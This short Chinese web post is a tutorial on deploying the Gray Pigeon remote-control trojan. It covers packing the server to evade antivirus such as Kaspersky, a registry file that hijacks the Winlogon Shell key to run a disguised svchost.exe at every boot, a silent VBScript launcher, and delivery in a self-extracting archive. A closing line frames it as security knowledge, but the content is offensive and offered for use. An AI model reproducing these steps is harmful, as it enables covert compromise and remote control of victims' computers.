[摘要]今天写一个木马小教程: 鸽子木马篇 鸽子是一个很好的远程控制软件, 效果如何就不多说了 生成鸽子服务端时, win98/2000/xp下写入注册表启动项 和win2000/xp下优化安装成服... 今天写一个木马小教程: 鸽子木马篇 鸽子是一个很好的远程控制软件, 效果如何就不多说了 生成鸽子服务端时, win98/2000/xp下写入注册表启动项 和win2000/xp下优化安装成服务启动项别勾上。 有利于做免杀, 简单得加个壳就可以卡巴等主流的杀毒软件, 壳到网上找找 只要去尝试就可以成功。 到本站上找也行:www.arpun.com 另外得给鸽子加个开机运行。 我们修改注册表 新建一个文本: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "Shell"="Explorer.exe %windir%\\svchost.exe" 后缀改成run.reg 再建一个文件 on error resume next dim ws set ws=wscript.createobject("wscript.shell") ws.run "regedit -s run.reg",0 ws.run "svchost.exe",0 后缀改成svchost.VBS, 是一个简单的VBS脚本。 一个注册表文件和一个VBS脚本, 自已体会一下, 不懂的上网看看资料。 再加鸽子的服务端一共三个文件。 创建一个自解压压缩包。 (建议别用捆绑器。 还可以用系统自带的:iexdivss)解压后运行svchost.vbs 每次系统启动后都会开机运行。 一个简单实用的木马就好了。 隐藏性较高。 还有些更高级的方法, 下次再写个教程。 关注ARP联盟:www.arpun.com 作者:小白。
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。
|